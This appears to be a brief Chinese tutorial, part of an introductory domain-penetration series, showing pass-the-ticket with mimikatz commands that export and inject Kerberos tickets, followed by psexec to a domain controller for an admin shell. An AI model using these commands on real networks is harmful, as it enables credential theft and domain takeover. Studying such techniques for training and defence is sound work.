域渗透入门(三)pass the ticket

参考资料

录制的视频教程

ptt票据传递实践

pass the hash: 一把钥匙开所有的门锁

pass the ticket: 进入房间后,找到备用钥匙(高权限票据),以备用钥匙来开门。有效时间10小时,过期后可以重新导入内存。域内普通用户获得域管理员权限。

dir \OWA2010SP3\C$

1
2
3
4
5
6
7
8
privilege::debug
sekurlsa::tickets /export		  #导出内存中的票据
kerberos::purge
以上命令可以写成下面的形式

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" exit

mimikatz.exe "privilege::debug"  "kerberos::ptt [0;3e4]-2-1-40e00000-SRV-DB-0DAY$@krbtgt-0DAY.ORG" exit

获取到域管理员权限之后

1
2
net time /domain 		#查域控的主机名
psexec.exe \OWA2010SP3 cmd.exe  		#使用域控主机名,获得域管理员权限的cmd shell